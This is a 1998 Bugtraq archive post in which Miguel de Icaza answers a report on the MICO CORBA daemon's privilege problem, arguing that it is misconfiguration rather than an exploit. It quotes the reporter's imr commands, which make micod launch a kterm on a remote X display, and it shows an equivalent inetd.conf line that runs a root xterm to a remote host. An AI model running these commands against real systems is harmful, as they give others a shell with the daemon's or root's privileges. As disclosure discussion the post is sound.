Bugtraq mailing list archives

Re: MICO: security problem: Privileges of micod for everybody!

From: miguel () NUCLECU UNAM MX (Miguel de Icaza)
Date: Sun, 10 May 1998 17:10:30 -0500

(micod ist started on inet:winkelklinke.local:8888)
(hacking from enfin.local, which has X on display :0)

imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
"kterm -display enfin.local:0 & echo" IDL:Anything:1.0
imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play


I would not consider this an explot, I would consider this just not
understanding what you are doing.

This `exploit' is equivalent to putting in your /etc/inetd.conf:

service stream tcp nowait root /usr/X11R6/bin/xterm -display somehost:0

Users of MICO need to implement their own authentication systems
(which we do, for those who care about the panel).

Best wishes,
Miguel.

Current thread:

Re: 3Com switches - undocumented access level.), (continued)
- - - Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
    - Re: 3Com switches - undocumented access level.) Joao Carlos Mendes Luis (May 10)
- Re: 3Com switches - undocumented access level. der Mouse (May 08)
  - Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
  - Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
    - Re: 3Com switches - undocumented access level. Michael Mittelstadt (May 10)
    - Re: 3Com switches - undocumented access level. NetSurfer (May 11)
  - Bay Networks Security Hole Marty Rigaletto (May 09)
    - coke.c snupe (May 09)
    - MICO: security problem: Privileges of micod for everybody! Dominique Unruh (May 10)
    - Re: MICO: security problem: Privileges of micod for everybody! Miguel de Icaza (May 10)
    - Re: Bay Networks Security Hole Jason Ackley (May 10)